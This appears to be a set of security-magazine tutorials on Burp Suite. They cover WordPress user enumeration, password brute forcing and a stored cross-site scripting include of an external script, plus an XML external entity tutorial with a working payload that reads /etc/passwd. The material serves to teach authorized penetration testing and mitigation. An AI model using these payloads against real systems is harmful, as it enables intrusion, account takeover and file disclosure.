going to begin by setting the scope of our testing by opening the Target->Scope tab at the top of the application, as shown in Figure 1. Before we add our target scope, take a moment to look at the "Exclude from scope" section. This section is useful for excluding pages such as logoff or sign-out pages which would otherwise kick you out of the application you are testing. To add a new application to our scope, select the "Add" button from the "Include in scope" section. A new dialog box will pop up, as per Figure 2, requesting further information on the scope of the testing. To include the application's domain in scope, enter your domain (in our case "example.com") into the "Host or IP range" input box, leaving the other fields at their default settings. Now we'll set up a few things to make our experience a little more streamlined. Under the Target->Site Map tab, select the filter at the top of the panel that contains the text "Filter: Hiding not found items…". To filter out unwanted items from the Site map tab we'll need to tick the checkbox beside "Show only in-scope items" – this just ensures that the site map is nice and tidy when we are viewing it. Now we'll do some basic setup of the Burp Scanner. Go to the Scanner tab and select the Live Scanning sub-tab, as shown in Figure 3. We want to make sure that "Live Active Scanning" is set to "Use suite scope", as otherwise we risk the scanner automatically testing sites outside the scope of our test, which could land us in trouble with the owners of those out-of-scope sites. It is important to be aware that "Live Active Scanning" can be quite dangerous, as it will take any base request to an application and automatically insert attack strings into discovered parameters, which are then sent to the application. As a result, if left unchecked there is a risk that the scanner could damage an application, submit hundreds of forms or send hundreds of emails. Before moving on, make sure that "Live Passive Scanning" is also set to "Use suite scope". Passive scanning won't send any new requests to the application but rather analyzes the content of responses received while browsing. We won't be using Burp's Spider functionality for this test, so it's best to turn it off completely, as we don't want it running wild, increasing the number of discovered pages and therefore the number of pages the active scanner will process. To make sure it's disabled, browse to the Spider->Control tab and ensure the spider is paused.
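The "use suite scope" behaviour can be pictured as a simple host-matching check performed before any active scan fires. The sketch below is illustrative only (Burp's real matcher also supports IP ranges, ports and regular expressions), and the helper name and example hosts are our own:

```python
from urllib.parse import urlparse

# Hypothetical sketch of an in-scope check in the spirit of Burp's
# suite scope: inclusions admit a host, exclusions veto specific paths.
INCLUDE_HOSTS = {"example.com"}                       # "Include in scope"
EXCLUDE_PATHS = ("/wp-login.php?action=logout",)      # e.g. a logoff page

def in_scope(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.hostname not in INCLUDE_HOSTS:
        return False
    # Exclusions win over inclusions, so sign-out links are never scanned.
    full_path = parsed.path + ("?" + parsed.query if parsed.query else "")
    return not any(full_path.startswith(p) for p in EXCLUDE_PATHS)
```

The point of the exclusion list is exactly the one made above: a scanner that follows a logoff link mid-test kicks itself out of its own session.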
Configuring the proxy
The browser you use to begin testing with doesn’t really matter all that much. To be sure you’ve caught everything you’ll most likely need to use a combination of different browsers. For the purposes of this article however we’ll just stick with Firefox. In order to have our traffic proxied through
Figure 1. Target scope
Figure 3. Live scanning options
Figure 2. Adding a new target
Figure 4. Proxy listeners
Burp, we'll need to open Firefox and change our proxy settings to use http://localhost:8080. This is the default listening address and port combination that Burp uses for its intercepting proxy (see Figure 4), which should have started listening when we started Burp. If you get connection-refused errors when trying to proxy through Burp, check the settings under Proxy->Options to see which proxy listeners are running. You can add more than one proxy listener if desired, but for now we're just going to stick with the default. The final task before we begin testing is to turn on intercepting. We turn this on under Proxy->Intercept by clicking the button labeled "Intercept is off". When the proxy is intercepting, this button should read "Intercept is on".
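Outside the browser, scripted requests can be routed through the same listener. A minimal stdlib sketch, assuming Burp is running on its default 127.0.0.1:8080 (for HTTPS targets you would additionally need to trust Burp's CA certificate):

```python
import urllib.request

# Burp's default intercepting-proxy listener.
BURP_PROXY = "http://127.0.0.1:8080"

# Build an opener that routes both schemes through Burp.
proxy_handler = urllib.request.ProxyHandler(
    {"http": BURP_PROXY, "https": BURP_PROXY}
)
opener = urllib.request.build_opener(proxy_handler)

# opener.open("http://example.com/wordpress/") would now show up
# in Proxy -> Intercept just like a browser request.
```

This is handy when you want tooling of your own to benefit from Burp's logging and scanning without configuring a browser at all.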
Mapping and scanning the application
Now we can finally begin our penetration testing. To begin, we simply enter our URL into the address bar in Firefox. If the previous steps have all been completed successfully, our Burp instance should capture and hold the request, and if we now browse to the Proxy->Intercept tab we should find an HTTP request waiting for us. This first request is just the initial request for connecting to the site and can be allowed through; to let it do so, just click the Forward button as shown in Figure 5. The first thing we want to do, now that we've confirmed everything is working, is turn off intercepting and browse the application. We want to get an idea of the application's layout and have this data available to Burp. As we browse the application, Burp will begin to add discovered pages to its scanner, so be careful about submitting forms. If you are working on a live application there is a chance of this function causing significant harm, so you should keep an eye on it, checking the Scanner->Scan Queue tab often to review which pages are scheduled to be scanned. It is important to inspect any entries in the list that might result in dangerous form submissions and remove them before that happens! While it is dangerous to leave the scanner unchecked, it can be incredibly useful when testing for different types of common application issues. In this particular case we are testing a development site that we can scan with impunity, so we can submit forms and comments as required and test with the scanner. The scanner will already have picked up on some issues as you've browsed through the site, so if you look under the Scanner->Results tab you should see something similar to Figure 6.
Paying attention to detail
As I mentioned earlier, since this is a test site we can submit forms and comments to our heart's content, so let's browse to a page that allows us to submit a comment. For now we'll just submit a plaintext comment with no attack strings included.
Figure 5. Captured request in proxy interceptor
Figure 6. Scanner results
Figure 7. WordPress comments posted by Burp's scanner
Once Burp begins to scan the comment submission (the progress of which we can check under the Scanner->Scan queue tab), we can open the application page we submitted the comment to and see the results of Burp's scanner, as shown in Figure 7. On this occasion it hasn't turned up anything useful, as WordPress sanitizes input from non-admin or unauthenticated users. Perhaps as we go through the application we can gain additional rights as a different user, which may result in less stringent validation – not an uncommon occurrence in web applications. It is also important to note at this stage that, if this had been a live site, we would just have filled up the comment board (and therefore the related database tables) with a large number of nonsensical comments.
Our first attack – user enumeration
As we continue browsing the application it is important to keep an eye out for any interesting parameters or patterns, and to keep a note of any items we should come back to later. One such pattern, noticeable in a default WordPress installation, is that each post contains an author's name as a signature, for example: "This entry was posted in Pentesting by killian". If we click on an author's name we are brought to a page listing all that author's contributions to the application, with a URL similar to http://example.com/wordpress/?author=2. In this case a pattern has led us to the author parameter, which appears to be something we should explore a little deeper (Verónica Valeros 2011). A quick manual inspection, substituting the value 2 for 1, gives us a different author's home page for each submitted integer, complete with what looks like the author's username. To this end, we turn our intercepting proxy on again and refresh the page, this time catching it in the intercepting proxy, where it should look something like the request in Figure 8. When the request is caught, right-click in the intercept pane and select the context menu option "Send to Intruder".
Now we can really start using some of the more useful features of Burp. Open the Intruder tab to display the four tabs beneath. To begin with, we're going to use the "Positions" tab, as shown in Figure 9, to define the type of attack we want to perform and to isolate the specific parameter we want to test. The first thing we need to do is choose the type of attack. There are four attack types available to us: sniper, battering ram, pitchfork and cluster bomb. For this particular test we are only going to use the sniper attack type, but later on we will also be using the cluster bomb type. The sniper attack type uses a single set of payloads and targets each payload position in turn. Payload positions are the insertion points in the request that we select, and payloads can be anything from sequential integers to custom-compiled attack strings loaded from external files.
Figure 8. Target request in proxy interceptor
Figure 9. Intruder with default payload positions
Burp will automatically highlight each potential payload position that could be used during the attack, as can be seen in Figure 9. As we are only interested in the "author" parameter right now, click the "Clear" button on the right-hand side of the Intruder->Positions pane. Once the pane has cleared the default selected parameters, highlight the author parameter value "2" and click the Add button. This selects the author parameter's value as an insertion point for the next step. Now we move to the Intruder->Payloads tab, select Payload set 1 and set the Payload type to "Numbers". This allows us to test a user-defined sequential set of numbers against the author parameter. In this case we'll only use sequential integer values between 0 and 20, as shown in Figure 10, as there are very few users of the application.
There is one further option we will be using that can help make life a bit easier when testing a site. Under the Intruder->Options tab we can specify a grep expression to extract specific terms from the responses we get back from the server. Scroll down the options tab until you see the "Grep – Extract" section, as shown in Figure 11. To fill out this grep expression we will need to look at the source of the returned page after performing a manual test of the author parameter. What we're looking for is something to identify the author's username, preferably something that uniquely identifies that user but is present on all authors' pages. Upon close inspection of our WordPress application, it seems that the text below is a good choice. This text is part of the link to the author's page that appears at the bottom of every post by the author.
We will now click the "Add" button beside the "Grep – Extract" section, which allows us to add a starting and ending point for our extraction, as shown in Figure 12. Everything inside these markers will be captured by the Intruder and inserted into one of its output columns as the test runs. It's also worth clicking the "Refetch Response" button prior to accepting, to make sure that you're retrieving the correct term. The highlighted text in the received response is what you can expect to get back from the Intruder after the attack. Now that we've configured the Intruder we can begin our attack. To do so, we click on the Intruder menu item at the top of the Burp window and choose "Start attack". At this point the window in Figure 13 will pop up, showing each request with columns for the payload (our integer values), the HTTP status of the request, the length of the response (useful when determining whether a returned request contains something of merit), the search string we specified in the "Grep – Extract" section, and a comment column. In this instance we're only concerned with the search-string column. In the next step we will use the usernames in this column as part of an attempt to brute-force the application's user accounts. In this instance we can see in Figure 13 that we have found the usernames killian, dave, admin, john, frank, tony and paddy.
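For reference, the extraction that the "Grep – Extract" rule performs can be sketched in a few lines of Python. The marker strings ('rel="author">' and '</a>') come from the article; the sample HTML is invented purely for illustration:

```python
import re

def extract_author(html):
    # Capture the text between the start marker 'rel="author">'
    # and the end marker '</a>', as Burp's Grep - Extract rule does.
    match = re.search(r'rel="author">([^<]+)</a>', html)
    return match.group(1) if match else None

# Invented sample mimicking a default WordPress author link
sample = '<a href="?author=2" rel="author">killian</a>'
print(extract_author(sample))  # killian
```

The same pattern applied to each intercepted response would reproduce the search-string column Burp builds automatically.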
Account brute forcing
Before beginning this step I want to point out that brute force testing can lock out user accounts, causing an effective denial of service, so make sure that you have the required authorization and that the application's owner is aware of the risks before beginning!
Figure 10. Intruder sniper payload options
Figure 11. Grep extraction settings
OPEN 01/2013
Figure 12. Defining and testing the pattern to capture
In order to make use of the usernames we found in the last step we will need to create a text file containing the names. In the attack window click on the "Save" menu item and choose to save the "Results table". Before saving, untick all the included columns except for our search column, which in this case is the 'rel="author">' column. Also make sure to untick the "Save header row" checkbox before saving. Once you have saved this to a file, open it and remove any blank lines or duplicates so that we don't waste time testing for a blank user or for the same user multiple times. Keep this file somewhere safe as we will be coming back to it shortly. The next step is to open up our browser again and try to log in to the site. As this is a default WordPress installation the login page will
Figure 13. Intruder results window displaying author names
Figure 14. Intruder payloads using author names
be http://example.com/wordpress/wp-login.php. After connecting to the login page we'll enter a random username and password. The purpose of this is to obtain a permission-denied error from the application so that we can use it as a baseline for our brute-force attack. Once again we'll need to intercept this request in our intercepting proxy before sending it to the Intruder. Once we've sent this request on to the Intruder we can begin setting up our attack. We'll choose the cluster bomb attack in this instance as we want to try each of our discovered usernames against a multitude of different passwords. Make sure to select only the username and password parameters in the Intruder window, which contain the random values we entered previously. Highlight these two values and add them as payload positions. Now we can move on to choosing our payloads. As we are now using the cluster bomb attack and have two parameters under attack, we can assign each position its own payload set. First we begin with the username payload set, which is where our earlier saved file comes into play. Set the payload set to 1 with a type of "Simple list", as can be seen in Figure 14. In the "Payload Options" section click the "Load …" button and browse to the username file we saved earlier. The resulting list should look something like that in Figure 14. Now to set up our second payload set, we set the "Payload set" to 2. The "Payload Options" will clear as we are now working with the second parameter's payloads. The target of this second payload set is our users' passwords, so a good password list is a must. I would recommend, however, not putting in anything too large as it will take a significant amount of time to test all the combinations. I tend to prefer a "breadth-first" attack when brute forcing as opposed to a depth-first one – i.e.
using a relatively short list of the most commonly used passwords with (if possible) a large list of known user accounts. If the breadth-first attempt doesn't work I fall back to a more general blanket search of as many usernames and passwords as I have available to me, but unfortunately in a cluster bomb attack the number of requests made is the product of the number of payloads in all defined payload sets. In this case we have 7 users, so if we tried 100 passwords that would equate to 700 requests. If we had a quite feasible 1,000 users with an equally feasible list of 100,000 potential passwords we would be looking at a cool 100,000,000 requests. As you can see, while
the number of requests isn't too bad for a small number of payloads, it increases pretty quickly. For this example I'll be using a drastically cut-down password list to which I've added some of the passwords in use in the application, to show how this kind of attack can succeed. Seeing as we now have both payload positions set up, it's time to start the attack. This attack will take a bit longer than the previous one did, so unless you've picked the passwords on the application you're testing it's usually a good time to go grab a coffee. Once the attack has finished it's time to take a look at the results, shown here in Figure 15. The easiest way to browse the results is to sort the columns. I usually sort first by Status and have a look at what's returned there, and if that yields no success then sorting by Response Length is your next stop. In this particular application either option will do fine, as you'll pick out the correct results easily based on either method. We can see in the above that there's something interesting about the last 3 attempts in the list, for the users admin, killian and tony. We'll focus on the admin user for the moment, because that's the most likely option for mischief. If we select the request in question and look at the bottom pane of the attack window we can view the response the
server sent back. It has sent us an HTTP 302 Redirect, as opposed to most of the other attempts, which sent us an HTTP 200 OK message. Upon inspection it becomes obvious that with Burp's help we've guessed the admin user's password. As shown in Figure 16, we can tell this by the "Location:" line in the response, which is redirecting us to the admin section of the application.
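The request-count arithmetic mentioned earlier (a cluster bomb issues the product of the payload set sizes) is easy to sanity-check; this tiny Python sketch reproduces the article's figures:

```python
from math import prod

def cluster_bomb_requests(payload_set_sizes):
    # Total requests = product of the number of payloads
    # in each defined payload set.
    return prod(payload_set_sizes)

print(cluster_bomb_requests([7, 100]))        # 700
print(cluster_bomb_requests([1000, 100000]))  # 100000000
```

This is why a breadth-first password list pays off: shrinking either set shrinks the total multiplicatively.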
Logging in
The obvious next step is to take the successful payload and log in to the site to continue our testing. As we're going to be logging in as the admin user I would advise turning off Live Scanning before proceeding, in case the scanner takes liberties and deletes all the application's users. After logging in as the admin user there are some tests that we performed earlier that could perhaps be run again with different results. Let's connect to one of the posts we commented on earlier and attempt to submit a comment with our new credentials. We'll just use a plain piece of text for the moment, which we will then feed into Burp's active scanner to test for us. This time we won't intercept the comment, but rather will pick it out from the "Site map" which can be found under the Target tab. As you can see in Figure 17 we can expand the wp-comments-post.php page under the Site map in order to see individual posts. Select the last post, which was performed as admin (highlighted in our case below), and right-click on it. From here we can use the context menu to perform an active scan on the page using the admin credentials and have Burp automatically post potentially dangerous content to the application.
Figure 15. Intruder results with username and password results
Figure 16. Viewing a response from the intruder's results
Figure 17. Target site map
Now we will move over to the Scanner->Results tab to see how our scan is going now that we have admin privileges. As can be seen in Figure 18, it looks as though Burp has detected a cross-site scripting issue which warrants closer inspection. On opening the page our comment was posted to, we're greeted with a familiar JavaScript alert box reminding us of the importance of the number 1 (Figure 19). We can use this opening to leverage a little more out of the application using Burp's repeater function, but first we're going to compare it to a second admin post to make sure that we can account for any per-post variables required, such as post IDs. Obviously we already know this won't yield any interesting information, but it's a good opportunity to see the Comparer in operation. We'll now open the Scanner->Results tab and highlight the offending issue. Burp should display several tabs in the bottom pane, including a Request and a Response tab showing what was sent and received to identify this vulnerability. We can select either the request or the response, then right-click in the middle of the pane and select "Send to Comparer" from the context menu.
Figure 18. Scanner results showing cross-site scripting
Figure 19. Cross-site scripting showing a JavaScript alert(1)
Now we just need to move back to the browser and create a new, clean comment to compare our vulnerable request with. To do so, submit a comment, catch it in the interceptor and send it to the Comparer. Once both comments have been sent to the Comparer we can open the Comparer tab. There are a few different ways to compare requests but we'll just focus on one in this article. Once in the Comparer window we select the option to compare words, located at the bottom right-hand side of the window. At this point we'll receive a popup window like that in Figure 20 which highlights the differences between the two requests. Clicking on the "Sync views" button will keep the two panes synchronized as we scroll down the requests, making it easier to compare them. In Figure 20 there's no significant difference as far as our current test is concerned, so we can proceed as planned.
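A rough stand-in for the Comparer's word-level diff can be sketched with Python's standard difflib; the two sample requests below are invented and merely illustrate the idea:

```python
import difflib

def compare_words(req_a, req_b):
    # Split each request into words and report only the words
    # that were removed ("-") or added ("+"), like a word-level compare.
    diff = difflib.ndiff(req_a.split(), req_b.split())
    return [line for line in diff if line.startswith(("-", "+"))]

# Invented examples standing in for two captured comment posts
a = "POST /wp-comments-post.php comment=hello comment_post_ID=8"
b = "POST /wp-comments-post.php comment=test comment_post_ID=8"
for change in compare_words(a, b):
    print(change)
```

Only the comment value differs, which is exactly the kind of result that lets you rule out hidden per-post parameters.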
Repeating requests
Now that we’re 110% sure that we don’t need to worry about missing post ids we can move on to the repeater. The repeater allows us to focus on a single page and tweak our attacks slowly but purposely to send crafted strings to the application. To start off with we can need to send one of our old friends, the comment post, to the repeater. What we’re hoping to achieve with the repeater is to build on the success of the active scan that successfully
Figure 20. Comparing requests
Figure 21. Cross-site scripting in a captured comment post
inserted a JavaScript alert box, by leveraging this issue to include a JavaScript script hosted elsewhere which will be loaded each time a user visits the page. This kind of script inclusion can be used for phishing attacks, cookie and credential stealing, site defacement, cross-site request forgeries and cross-site scripting (XSS) proxying, amongst other attacks. After we have sent the previously successful request to the Repeater we will need to open it up under the Repeater tab in order to alter it. The purpose of this is to substitute the original attack string for a new, more purposeful one. For the WordPress application I'm going to start off trying to include a custom JavaScript script using variations of the string: <script src=http://example.org/crosssite.js>. Once we've substituted the string, click on the Go button to send the request to the application. In this case (and in many other cases) the application will take our request and issue a redirect. We can follow this by selecting the "Follow redirection" button to the right of the Go button. Depending on the string used the attack may or may not work… but that's the great thing about the Repeater! We can try again and everything's already set up for us! Before resetting our Repeater, have a look through the source of the response to see what's gone wrong with the request. How is the inserted string represented in the returned page? What changes can we make to ensure it works next time? Try opening the response in your browser to get a feel for what's going on from a user's perspective by right-clicking on the response and selecting "Show response in browser". After investigating what our next step is, it's time to get back to work. In order to go back a few steps to the original request we need to hit the back button a few times on the Repeater. It's often necessary to keep trying slightly different
combinations until you find one that sticks. Eventually you'll find yourself able to submit an attack string that takes and loads in your external JavaScript file. I like to keep my includes simple and to the point: just enough to show that it's feasible to inject JavaScript on the site and include external information. Once we've successfully completed our attack we should be able to browse to the application page we submitted our comment to and view the results of our JavaScript include, as shown in Figure 22. As you can see, the URL we're connecting to is still http://example.com/wordpress/?p=8 but we now control the content of the page!
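A common reason a raw script payload fails on the first Repeater attempt is that the application HTML-encodes user input on output. Python's standard html module illustrates the transformation; this is a generic illustration of output encoding, not a claim about WordPress's actual filtering:

```python
import html

# The payload mirrors the include string used above.
payload = "<script src=http://example.org/crosssite.js></script>"

# html.escape turns markup characters into harmless entities,
# which is what you often see when inspecting the returned page source.
encoded = html.escape(payload)
print(encoded)
```

Spotting which characters survive encoding (and which contexts skip it) is what guides the next variation of the attack string.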
Conclusion
In this article we covered some of the more useful and widely used Burp components and showed how they can be leveraged to include and help improve on automated scanning techniques. We went through attacking a default WordPress installation and how to get from having no prior knowledge to obtaining administrative credentials. The Burp Suite is an immensely useful intercepting proxy and has many more features, including the ability to include custom add-ons, that I haven't even touched on in this article. Hopefully reading this article has given you some insight into the Burp Suite and its capabilities and will spur you on to give it a try yourself. If you do want to try it out, the free edition includes the proxy, spider, repeater and comparer, which is enough to get you started with manual testing. If you want the more automated features you will need to spring for the Professional edition – but it's well worth it.
Works Cited
Verónica Valeros, Talsoft S.R.L. "WordPress User ID and User Name Disclosure." May 26, 2011. http://www.talsoft.com.ar/index.php/research/security-advisories/wordpress-user-id-and-user-name-disclosure (accessed October 31, 2012).
Killian Faughnan
Figure 22. Using cross-site scripting to control page content
Killian Faughnan works in Dublin, Ireland as an Information Security Consultant for Ward Solutions, performing penetration tests on all sorts of infrastructure and applications (the vast majority of which have nothing to do with WordPress!). He can be reached at www.killianfaughnan.com or on LinkedIn at www.linkedin.com/in/kfaughnan.
RESEARCH INSTITUTE OF FORENSIC AND E-CRIME
Protection through Research RIFEC OFFERS A FREE RISK ANALYSIS SERVICE CONTACT US FOR FURTHER INFORMATION
The growth of the internet and the massive use of new technologies has been the biggest social change of our lifetime. Increasing dependence on these technologies has brought new risks. RIFEC takes these risks seriously. In our laboratories we conduct research to tackle these threats and develop our response. Our objective is to set strategies to reduce vulnerabilities and secure the benefits of a trusted digital environment for businesses and individuals.
Web: www.rifec.com
Twitter: www.twitter.com/rifec
LinkedIn: www.linkedin.com/company/rifec
Email: info@rifec.com
BURP SUITE
Infiltrating Corporate Networks Using XML External Entity Injection
This tutorial explains how to exploit an XML External Entity Injection (XXE) vulnerability using Burp Suite and make the most of it. Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities.
In order to understand the material of this article you need a basic working knowledge of Burp Suite; specifically, you should know how Burp Intruder works, and you should also have a basic understanding of how XML works.

What is an External Entity Injection (XXE)
An XXE Injection is, generally speaking, a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. Nowadays it is rare to find this type of security issue; this type of attack has been well documented and known since 2002. The XML external entity injection vulnerability arises because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced into opening arbitrary files and/or TCP connections (e.g. embedding data from outside the main file into an XML document). A successful XXE Injection attack could allow an attacker to access the operating system's file system, cause a Denial of Service (DoS) attack or inject JavaScript (e.g. perform a Cross Site Scripting attack).

How the XML parser works
When the XML processor recognizes an external reference to a parsed entity (the parsed entity in our situation being the request made by our Internet browser, as processed by the XML parser), then, in order to validate the document (the document in our situation being the server response), the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating XML processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity (although in practice that might not happen). When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.
How the XML parser handles a XXE
An external entity identifier is meant to convert to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article (or a processing instruction defined by a particular application specification), relative URIs are relative to the location of the resource within which the entity declaration occurs. This is defined to be the external entity containing the '<' which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).
Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inside an XML document, or as an external reference. Further analysis of XML parser functionality is outside the scope of this article.

An example of XXE
XML parsers are used in many different applications, either to load XML documents locally from the hard disk of a workstation or to process remote requests through various protocols (such as HTTP). In this example it is assumed that an application is using a badly configured XML parser to load an XML document. The following XML document will make such a parser read /etc/passwd (if the underlying operating system is a Unix or Linux system) and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>

The ENTITY definition creates the xxe entity, and the final line references it. The textual content of the PutMeHere tag will become the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser then the passwd file is going to be loaded. The XML document is not valid if the entity reference is not started with the '&' character and terminated with the ';' character.
Note: The attack is limited to files containing text that the XML parser will allow at the place where the External Entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
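To make the mechanics concrete, here is a deliberately simplified simulation, not a real XML parser, of how a badly configured parser expands an external SYSTEM entity. The file reader is injected so the example runs against a fake in-memory file system instead of the real /etc/passwd:

```python
import re

def naive_expand(xml_text, read_file):
    # Collect <!ENTITY name SYSTEM "path"> declarations from the DTD,
    # then blindly substitute each &name; reference with the file's content,
    # exactly the behavior a vulnerable parser exhibits.
    entities = dict(re.findall(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]+)"', xml_text))
    return re.sub(
        r"&(\w+);",
        lambda m: read_file(entities[m.group(1)]) if m.group(1) in entities else m.group(0),
        xml_text,
    )

doc = ('<!DOCTYPE PutMeHere [<!ENTITY xxe SYSTEM "/etc/passwd">]>'
       "<PutMeHere>&xxe;</PutMeHere>")
fake_fs = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash"}
print(naive_expand(doc, fake_fs.get))
```

The expanded output places the file's content inside the PutMeHere tag, which is precisely what the server then echoes back to the attacker.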
Identifying XXE Injections
The following table contains attack strings that can help break the XML schema and cause the XML parser to return verbose errors, helping to identify the XML structures (Table 1). Note: The CDATA section delimiters <![CDATA[ / ]]> are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, the XML parser does not parse the characters enclosed in a CDATA section.
Table 1. Attack strings to break the XML schema
1. '
2. ''
3. "
4. ""
5. <
6. >
7. ]]>
8. ]]>>
9. <!--/-->
10. /-->
11. -->
12. <!--
13. <!
14. <![CDATA[ / ]]>

The XXE attack scenario
A XXE exploit can, as already mentioned, result in read access to the operating system's (OS) hard disk, a side effect similar to a path traversal attack. A more complex scenario would be a sophisticated application that performs, for example, e-banking transactions and uses the browser as a thin-client end point that consumes a web service after a successful login. So let's assume that the transaction XML message carries the user name and password back and forth, along with the XML message, in order to perform the login and authorize the user.
Note: All information needed for the transaction is encapsulated inside the XML message.
Note: An HTTP 200 response is returned along with the success message for the transaction.
Figure 1. Burp Proxy → Capture the request and send to Burp Intruder
Using Burp to exploit the XXE
The free version of Burp Suite can be used to identify and exploit this type of vulnerability. The first thing to do is to create a file containing all the attack strings in the table above. Let's assume that such a file has already been created and named payloads. The next thing to do is to load the payload file into Burp Intruder and launch the attack (Figure 1 and Figure 2). Note: If the web application is vulnerable to XXE injection then you will start receiving verbose XML error messages indicating that the application is vulnerable (Figures 3-5). After you launch the attack and identify that the web application is vulnerable to XXE Injection,
Figure 3. Burp Intruder → Load the payload file
Figure 4. Burp Intruder → Switch to sniper mode
Figure 2. Burp Intruder → Mark the vulnerable web application part
Figure 5. Burp Intruder → Launch the attack
References
• http://www.securityfocus.com/archive/1/297714
• http://www.w3.org/TR/REC-xml/#include-if-valid
• http://www.securiteam.com/securitynews/6D0100A5PU.html
• http://shh.thathost.com/secadv/adobexxe/
• http://portswigger.net/burp/
• http://code.google.com/p/teenage-mutant-ninja-turtles/
• http://securityhorror.blogspot.ie/2012/03/what-is-xxe-attacks.html
you insert the following string in the entry point designated in the screenshot above: <!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>. If the attack is successful, the server response will be the one shown on the next page.
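The payloads file mentioned earlier can also be generated programmatically; this sketch writes the Table 1 attack strings to a file ready for loading into Burp Intruder's "Simple list" payload type (file location is arbitrary):

```python
import os
import tempfile

# The strings mirror Table 1 from earlier in the article.
ATTACK_STRINGS = ["'", "''", '"', '""', "<", ">", "]]>", "]]>>",
                  "<!--/-->", "/-->", "-->", "<!--", "<!", "<![CDATA[ / ]]>"]

def write_payload_file(path):
    # One attack string per line, the format Burp Intruder expects.
    with open(path, "w") as fh:
        fh.write("\n".join(ATTACK_STRINGS) + "\n")

path = os.path.join(tempfile.mkdtemp(), "payloads")
write_payload_file(path)
```

Keeping the list in a file means the same payload set can be reused across engagements without retyping.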
More on what you can do with a successful XXE attack
An advanced attacker can use the vulnerable web application as a web proxy, retrieving sensitive content from any web server that the application can reach, including those running within the organization's DMZ using non-routable address space. Expanding on the subject, we can assume that:
• The attacker can exploit vulnerabilities on back-end databases (e.g. perform web directory brute forcing, exploit SQL injections or retrieve files through path traversal injections).
• The attacker can also port scan surrounding machines by cycling through large numbers of IP addresses and port numbers. In some cases, timing differences can be used to infer the state of a requested port. In other cases, the service banners from some services may actually be returned within the web application responses.
• The attacker might be able to use the vulnerable web server to map firewall rules on other company extranets.
• The attacker might also be able to launch DoS attacks against internal company web server machines.
• The attacker might be able to hide his/her traces by mixing port scans with the fake traffic generated from the vulnerable web server by the XXE requests.
Mitigation of XXE vulnerabilities
The XML parser should not follow URIs to external entities, or should only follow known-good URIs. With some parsers, in order to disable XXE one must set setExpandEntityReferences to false, but note that this doesn't do what you expect with some of the XML parsers out there. An XML external entity injection can use the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation of your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.
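As a point of comparison, Python's standard-library xml.etree.ElementTree parser refuses external entity expansion out of the box, raising a ParseError instead of reading the referenced file (this behavior is documented in Python's XML security notes):

```python
import xml.etree.ElementTree as ET

# The same malicious document used in the XXE example earlier.
malicious = ('<!DOCTYPE PutMeHere [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
             "<PutMeHere>&xxe;</PutMeHere>")

try:
    ET.fromstring(malicious)
    result = "expanded"   # a vulnerable parser would reach this branch
except ET.ParseError:
    result = "blocked"    # the safe default: the entity is never resolved
print(result)
```

A parser that fails closed like this is exactly the behavior the mitigation advice above is aiming for.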
Gerasimos Kassaras
Gerasimos is a security consultant holding an MSc in Information Security and a CISSP, specializing in penetration testing. Working alongside diverse and highly skilled teams, Gerasimos has been involved in countless comprehensive security tests for global application platforms, counting more than 200 web application penetration tests so far. The majority of his experience is in the financial and telecommunications sectors in Greece, the United Kingdom, Italy, Turkey, Ireland and Dubai.
BURP SUITE
Web Application Penetration Testing Using Burp Suite
Burp Suite is an integrated platform with a number of tools and interfaces to enumerate, analyze, scan, and exploit web applications. Its main tool, Burp Proxy, is used to intercept HTTP requests and responses, but the suite has been extended to provide a range of other useful tools for web app penetration testing. In this article, I will introduce some of the features of Burp Suite and share my experiences using these tools.
There are so many tools available for web application penetration testing, and every pen-tester has their own toolkit to carry out the testing process, ranging from the initial analysis of applications and vulnerabilities to constructing attacks that exploit those vulnerabilities. One common tool favored by pen-testers is Burp Suite.
Burp Features
Burp Suite contains many tools including:
• Proxy: Burp Proxy is a tool used to inspect and modify traffic between your browser and the target application.
• Spider: Burp Spider is a tool for mapping web applications. It uses various crawling techniques to generate an inventory of the application's content and functionality.
• Scanner: Burp Scanner is a tool for discovering security vulnerabilities in web applications. It provides the option to conduct passive and active scanning.
• Intruder: Burp Intruder is a tool for automating customized attacks against web applications.
• Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analyzing their responses.
• Sequencer: Burp Sequencer is a tool for analyzing the degree of randomness in application tokens.
